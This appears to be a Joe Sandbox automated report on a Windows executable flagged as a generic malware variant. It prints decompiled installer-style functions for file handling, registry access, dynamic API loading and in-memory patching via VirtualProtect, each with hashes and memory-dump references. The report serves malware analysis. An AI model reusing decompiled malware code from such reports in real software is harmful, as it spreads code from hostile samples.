                                  • Instruction Fuzzy Hash: 3EE092B4600209BFEB10AB64AE49F7B7AACEB04704F004565BA51E61A1DB78E8158A78
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040690A(signed int _a4) {
                                  				struct HINSTANCE__* _t5;
                                  				signed int _t10;
                                  
                                  				_t10 = _a4 << 3;
                                  				_t8 =  *(_t10 + 0x40a3e0);
                                  				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
                                  				if(_t5 != 0) {
                                  					L2:
                                  					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
                                  				}
                                  				_t5 = E0040689A(_t8); // executed
                                  				if(_t5 == 0) {
                                  					return 0;
                                  				}
                                  				goto L2;
                                  			}





                                  0x00406912
                                  0x00406915
                                  0x0040691c
                                  0x00406924
                                  0x00406930
                                  0x00000000
                                  0x00406937
                                  0x00406927
                                  0x0040692e
                                  0x00000000
                                  0x0040693f
                                  0x00000000

                                  APIs
                                  • GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                    • Part of subcall function 0040689A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                    • Part of subcall function 0040689A: wsprintfW.USER32 ref: 004068EC
                                    • Part of subcall function 0040689A: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                  • String ID:
                                  • API String ID: 2547128583-0
                                  • Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                  • Instruction ID: 98bdf7d71c6046f852b78b75196177710d0a141037308efd39b2ac7baa162fea
                                  • Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                  • Instruction Fuzzy Hash: 9FE0867390422066D21196745D44D7773A89B99750306443EF946F2090DB38DC31A76E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 68%
                                  			E0040602D(WCHAR* _a4, long _a8, long _a12) {
                                  				signed int _t5;
                                  				void* _t6;
                                  
                                  				_t5 = GetFileAttributesW(_a4); // executed
                                  				asm("sbb ecx, ecx");
                                  				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                  				return _t6;
                                  			}





                                  0x00406031
                                  0x0040603e
                                  0x00406053
                                  0x00406059

                                  APIs
                                  • GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: File$AttributesCreate
                                  • String ID:
                                  • API String ID: 415043291-0
                                  • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                  • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                                  • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                  • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00406008(WCHAR* _a4) {
                                  				signed char _t3;
                                  				signed char _t7;
                                  
                                  				_t3 = GetFileAttributesW(_a4); // executed
                                  				_t7 = _t3;
                                  				if(_t7 != 0xffffffff) {
                                  					SetFileAttributesW(_a4, _t3 & 0x000000fe);
                                  				}
                                  				return _t7;
                                  			}





                                  0x0040600d
                                  0x00406013
                                  0x00406018
                                  0x00406021
                                  0x00406021
                                  0x0040602a

                                  APIs
                                  • GetFileAttributesW.KERNELBASE(?,?,00405C0D,?,?,00000000,00405DE3,?,?,?,?), ref: 0040600D
                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406021
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: AttributesFile
                                  • String ID:
                                  • API String ID: 3188754299-0
                                  • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                  • Instruction ID: c979a2e86073268fb5c10017c0603d576bb262e7e1663e1e1b2ee048d1a5e24b
                                  • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                  • Instruction Fuzzy Hash: 34D012725041316FC2102728EF0C89BBF55EF643717014B35F9A5A22F0CB304C638A98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00405AEB(WCHAR* _a4) {
                                  				int _t2;
                                  
                                  				_t2 = CreateDirectoryW(_a4, 0); // executed
                                  				if(_t2 == 0) {
                                  					return GetLastError();
                                  				}
                                  				return 0;
                                  			}




                                  0x00405af1
                                  0x00405af9
                                  0x00000000
                                  0x00405aff
                                  0x00000000

                                  APIs
                                  • CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                                  • GetLastError.KERNEL32 ref: 00405AFF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: CreateDirectoryErrorLast
                                  • String ID:
                                  • API String ID: 1375471231-0
                                  • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                  • Instruction ID: 33feed20cbbf131019f18849f7ccc9358209a8d33535326e0157453b6049084a
                                  • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                  • Instruction Fuzzy Hash: 1BC04C30204501AED6105B609E48B177AA4DB50741F16843D6146E41E0DA789455EE2D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 33%
                                  			E00402891(intOrPtr __edx, void* __eflags) {
                                  				long _t8;
                                  				long _t10;
                                  				LONG* _t12;
                                  				void* _t14;
                                  				intOrPtr _t15;
                                  				void* _t16;
                                  				void* _t19;
                                  
                                  				_t15 = __edx;
                                  				_pop(ds);
                                  				if(__eflags != 0) {
                                  					_t8 = E00402D84(2);
                                  					_pop(_t14);
                                  					 *((intOrPtr*)(_t19 - 0x10)) = _t15;
                                  					_t10 = SetFilePointer(E0040649D(_t14, _t16), _t8, _t12,  *(_t19 - 0x24)); // executed
                                  					if( *((intOrPtr*)(_t19 - 0x2c)) >= _t12) {
                                  						_push(_t10);
                                  						_push( *((intOrPtr*)(_t19 - 0xc)));
                                  						E00406484();
                                  					}
                                  				}
                                  				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t19 - 4));
                                  				return 0;
                                  			}










                                  0x00402891
                                  0x00402891
                                  0x00402892
                                  0x0040289a
                                  0x0040289f
                                  0x004028a0
                                  0x004028af
                                  0x004028b8
                                  0x004028be
                                  0x00402ba1
                                  0x00402ba4
                                  0x00402ba4
                                  0x004028b8
                                  0x00402c2d
                                  0x00402c39

                                  APIs
                                  • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004028AF
                                    • Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: FilePointerwsprintf
                                  • String ID:
                                  • API String ID: 327478801-0
                                  • Opcode ID: 1a69bed114d0c3cb27e295a60469d00fb85b85c1c8bbaab52ea3f411131a6a45
                                  • Instruction ID: a13d1cf18dcce6f7d85bed0b4e0fde0de6b16079219dfacd376ffc086bc6f252
                                  • Opcode Fuzzy Hash: 1a69bed114d0c3cb27e295a60469d00fb85b85c1c8bbaab52ea3f411131a6a45
                                  • Instruction Fuzzy Hash: D3E09271A04105BFDB01EFA5AE499AEB3B8EF44319B10483BF102F00C1DA794D119B2D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004023B2(int __eax, WCHAR* __ebx) {
                                  				WCHAR* _t11;
                                  				WCHAR* _t13;
                                  				void* _t17;
                                  				int _t21;
                                  
                                  				_t11 = __ebx;
                                  				_t5 = __eax;
                                  				_t13 = 0;
                                  				if(__eax != __ebx) {
                                  					__eax = E00402DA6(__ebx);
                                  				}
                                  				if( *((intOrPtr*)(_t17 - 0x2c)) != _t11) {
                                  					_t13 = E00402DA6(0x11);
                                  				}
                                  				if( *((intOrPtr*)(_t17 - 0x20)) != _t11) {
                                  					_t11 = E00402DA6(0x22);
                                  				}
                                  				_t5 = WritePrivateProfileStringW(0, _t13, _t11, E00402DA6(0xffffffcd)); // executed
                                  				_t21 = _t5;
                                  				if(_t21 == 0) {
                                  					 *((intOrPtr*)(_t17 - 4)) = 1;
                                  				}
                                  				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t17 - 4));
                                  				return 0;
                                  			}







                                  0x004023b2
                                  0x004023b2
                                  0x004023b4
                                  0x004023b8
                                  0x004023bb
                                  0x004023c0
                                  0x004023c5
                                  0x004023ce
                                  0x004023ce
                                  0x004023d3
                                  0x004023dc
                                  0x004023dc
                                  0x004023e9
                                  0x004015b4
                                  0x004015b6
                                  0x0040292e
                                  0x0040292e
                                  0x00402c2d
                                  0x00402c39

                                  APIs
                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023E9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: PrivateProfileStringWrite
                                  • String ID:
                                  • API String ID: 390214022-0
                                  • Opcode ID: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
                                  • Instruction ID: de4cb5ca612a6b97b91745c8380e1d92b079ec7b797fcdaf288f77766e75fad7
                                  • Opcode Fuzzy Hash: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
                                  • Instruction Fuzzy Hash: FAE04F31900124BBDF603AB11F8DEAE205C6FC6744B18013EF911BA1C2E9FC8C4146AD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004063D8(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
                                  				void* _t7;
                                  				long _t8;
                                  				void* _t9;
                                  
                                  				_t7 = E00406329(_a4,  &_a12);
                                  				if(_t7 != 0) {
                                  					_t8 = RegCreateKeyExW(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
                                  					return _t8;
                                  				}
                                  				_t9 = 6;
                                  				return _t9;
                                  			}






                                  0x004063e2
                                  0x004063eb
                                  0x00406401
                                  0x00000000
                                  0x00406401
                                  0x004063ef
                                  0x00000000

                                  APIs
                                  • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E57,00000000,?,?), ref: 00406401
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                  • Instruction ID: ccab944935cfefb85f0e849ce69279fb55db75a3b7fb0960311cd9d36817041a
                                  • Opcode Fuzzy Hash: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                  • Instruction Fuzzy Hash: 04E0E6B2010109BFEF095F90DC0AD7B3B1DE704300F01892EFD06D4091E6B5AD306675
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004060DF(void* _a4, void* _a8, long _a12) {
                                  				int _t7;
                                  				long _t11;
                                  
                                  				_t11 = _a12;
                                  				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                  				if(_t7 == 0 || _t11 != _a12) {
                                  					return 0;
                                  				} else {
                                  					return 1;
                                  				}
                                  			}





                                  0x004060e3
                                  0x004060f3
                                  0x004060fb
                                  0x00000000
                                  0x00406102
                                  0x00000000
                                  0x00406104

                                  APIs
                                  • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403498,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 004060F3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: FileWrite
                                  • String ID:
                                  • API String ID: 3934441357-0
                                  • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                  • Instruction ID: d8d859634201a592f38c73999a999f352708a9e59580de02994c407fa40ca669
                                  • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                  • Instruction Fuzzy Hash: FAE08C3220026AABEF109E60DC04AEB3B6CFB00360F014837FA16E7081E270E93087A4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004060B0(void* _a4, void* _a8, long _a12) {
                                  				int _t7;
                                  				long _t11;
                                  
                                  				_t11 = _a12;
                                  				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                  				if(_t7 == 0 || _t11 != _a12) {
                                  					return 0;
                                  				} else {
                                  					return 1;
                                  				}
                                  			}





                                  0x004060b4
                                  0x004060c4
                                  0x004060cc
                                  0x00000000
                                  0x004060d3
                                  0x00000000
                                  0x004060d5

                                  APIs
                                  • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E2,00000000,00000000,00403306,000000FF,00000004,00000000,00000000,00000000), ref: 004060C4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: FileRead
                                  • String ID:
                                  • API String ID: 2738559852-0
                                  • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                  • Instruction ID: 1583d2e05e1cff28e3594e7db3f0db2d88eef65457287744bb544c492d9958e5
                                  • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                  • Instruction Fuzzy Hash: AEE0EC322502AAABDF10AE65DC04AEB7B6CEB05361F018936FD16E6150E631E92197A4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                  
                                  				 *0x732f5048 = _a4;
                                  				if(_a8 == 1) {
                                  					VirtualProtect(0x732f505c, 4, 0x40, 0x732f504c); // executed
                                  					 *0x732f505c = 0xc2;
                                  					 *0x732f504c = 0;
                                  					 *0x732f5054 = 0;
                                  					 *0x732f5068 = 0;
                                  					 *0x732f5058 = 0;
                                  					 *0x732f5050 = 0;
                                  					 *0x732f5060 = 0;
                                  					 *0x732f505e = 0;
                                  				}
                                  				return 1;
                                  			}



                                  0x732f2a88
                                  0x732f2a8d
                                  0x732f2a9d
                                  0x732f2aa5
                                  0x732f2aac
                                  0x732f2ab1
                                  0x732f2ab6
                                  0x732f2abb
                                  0x732f2ac0
                                  0x732f2ac5
                                  0x732f2aca
                                  0x732f2aca
                                  0x732f2ad2

                                  APIs
                                  • VirtualProtect.KERNELBASE(732F505C,00000004,00000040,732F504C), ref: 732F2A9D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.778451619.00000000732F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 732F0000, based on PE: true
                                  • Associated: 00000000.00000002.778443971.00000000732F0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000000.00000002.778458851.00000000732F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000000.00000002.778463521.00000000732F6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_732f0000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: ProtectVirtual
                                  • String ID:
                                  • API String ID: 544645111-0
                                  • Opcode ID: 5448c4bcc98d31c4df1da64b84279125e96003bee5525d1888803c817307d0ad
                                  • Instruction ID: dfc615049d45def781b22005a4df07ce5fcde1cf2f2f0209bf91d82eaa5adf46
                                  • Opcode Fuzzy Hash: 5448c4bcc98d31c4df1da64b84279125e96003bee5525d1888803c817307d0ad
                                  • Instruction Fuzzy Hash: C3F07FF2544282EFC350EB2A8548B097BE0E70D224F35852EA19CD6241E3744284AF95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004063AA(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
                                  				void* _t7;
                                  				long _t8;
                                  				void* _t9;
                                  
                                  				_t7 = E00406329(_a4,  &_a12);
                                  				if(_t7 != 0) {
                                  					_t8 = RegOpenKeyExW(_t7, _a8, 0, _a12, _a16); // executed
                                  					return _t8;
                                  				}
                                  				_t9 = 6;
                                  				return _t9;
                                  			}






                                  0x004063b4
                                  0x004063bb
                                  0x004063ce
                                  0x00000000
                                  0x004063ce
                                  0x004063bf
                                  0x00000000

                                  APIs
                                  • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406438,?,00000000,?,?,Call,?), ref: 004063CE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: Open
                                  • String ID:
                                  • API String ID: 71445658-0
                                  • Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                  • Instruction ID: 4361357c0318622cec318f667d88df30c4c29b75262f7bca7234b06b46464da2
                                  • Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
